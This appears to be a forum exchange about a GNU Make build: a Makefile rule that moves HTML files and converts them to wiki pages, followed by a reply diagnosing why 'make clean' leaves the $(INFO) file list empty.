move-html:
$(shell [[ '0' -ne `find ./ -maxdepth 1 -name "*.html" | wc -l` ]] && \
mv -f *.html $(HTMLDOCDST)/)
$(foreach html, $(wildcard $(HTMLDOCDST)/*.html), \
$(HTML2WIKI) $(HTML2WIKIO) $(html) > \
$(addprefix $(WIKIDST)/, $(notdir $(html:.html=.wiki))))
Needless to mention how much I like the solution and the language that makes one devise one.
There are several problems here. This may take a few iterations.
First, when you make clean you delete i-iterate/ and everything in it, including i-iterate/info/whatever.texi. Since there are no texi files, Make deduces that no info files need be made; $(INFO) is an empty list.
I gather that by some black magic the emacs command creates an info/ directory full of texi files out of the ether, which Make then copies into i-iterate/ (in the default rule). Is that correct? If it is correct, then we should do this before the $(INFO) step. I suspect that the same is true of the $(WIKI) step, but let's not get ahead of ourselves.